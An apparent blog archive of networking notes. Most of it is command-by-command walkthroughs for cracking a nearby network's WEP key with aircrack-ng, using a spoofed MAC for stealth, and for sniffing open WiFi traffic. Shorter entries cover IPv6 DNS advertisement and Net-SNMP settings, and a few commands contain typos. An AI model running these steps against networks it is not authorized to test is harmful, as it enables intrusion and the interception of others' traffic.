Category Archives: Networking

Breaking WEP Encryption

Using Debian Wheezy (testing) with a Intel Corporation Centrino Wireless-N 1000 card…

    1. Stop network manager: /etc/init.d/network-manager stop
    2. Enter monitor mode: airmon-ng start wlan0
    3. Find nearby networks: airodump-ng mon0
    4. Identify the target BSSID, SSID and Channel number (-c option below)
    5. Start packet capture and leave running: airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w capturefile mon0
    6. Run the following two commands at the same time in separate windows (-h changes our source address, to add some stealth)
      1. aireplay-ng --fakeauth 40 -a 00:11:22:33:44:55 -h 01:12:34:56:67:89 --ignore-negative-one mon0
      2. aireplay-ng --arpreplay -x 20 -b 00:11:22:33:44:55 -h 01:12:34:56:67:89 --ignore-negative-one -e SSID mon0
      3. when this sees an ARP packet, it will go like crazy injecting packets and you will see the "#Data" rapidly increasing in the airodump-ng window
    7. After collecting 30,000 packets (you may leave airodump-ng running): aircrack-ng -1 capturefile.cap
    8. The WEP key should then be displayed in the terminal window.
    9. The collected packet trace may be decrypted with: airdecap-ng -w $wep_key_hex capturefile.cap
    10. Exit monitor mode: airmon-ng stop mon0

Open Wireless Network Packet Sniffing

This is easier and more effective than packet sniffing on a wired network:

  1. Stop Network Manager: /etc/init.d/network-manager stop
  2. Set your WiFi card into monitoring mode: airmon-ng start wlan0
  3. See what’s around: airodump-ng mon0
  4. Select a target network, and note the BSSID value and channel (used as ‘-c‘ option below)
  5. Collect the packet trace: airodump-ng -c 6 --bssid 00:12:34:56:78:90 -w output-file mon0
  6. Examine packet trace: wireshare output-file.cap

(run on Debian Wheezy [testing] using Intel Corporation Centrino Wireless-N 1000)

WiFi Card – Packet Injection in Linux

Very simple way to test if your WiFi card supports injection:

Stop Network Manager: /etc/init.d/network-manager stop
Put the card in monitor mode: airmod-ng start wlan0
Test using: aireplay-ng -9 mon0

With luck, the following output is displayed:
Trying broadcast probe requests…
Injection is working!

I am using Debian Wheezy (testing) with WiFi card:
Network controller: Intel Corporation Centrino Wireless-N 1000

IPv6 DNS Advertisements

DNS client configuration can be handled by the standard Router Advertisement Daemon (radvd) – apt-get install radvd

Edit /etc/radvd.conf on your Linux Router and insert the following at the end of the file to use Google’s DNS Caching server:

RDNS 2001:4860:4860::8888
{
};

On your Linux clients install rdnssd. To automatically add the advertised IPv6 DNS servers to your /etc/resolv.conf

The /etc/resolv.conf now contains both IPv4 and IPv6 entries. Typically a DHCP client is adding the IPv4 DNS server entries, this can be prevented by removing ‘domain-name-servers’ from the ‘request’ line in dhclient.conf

Net-SNMP writable attribute

Solarwinds NMS verifies the SNMP write configuration of its nodes (agents) by attemping to set the ‘sysContact.0’ (1.3.6.1.2.1.1.4.0) value.

On Net-SNMP you must first configure the ‘rwcommunity’ setting in the snmpd.conf file. Do not set ‘sysContact’ value in snmpd.conf.

Configuring ‘sysContact’ (or any other ‘sys’ setting) in the configuration file, results in that value being set as read-only. You will not be able to remotely configure the value, and Solarwinds configuration tests will fail.

Instead set values like ‘sysContact’, ‘sysName’, ‘sysDecr’ etc, using the command snmpset included with net-snmp.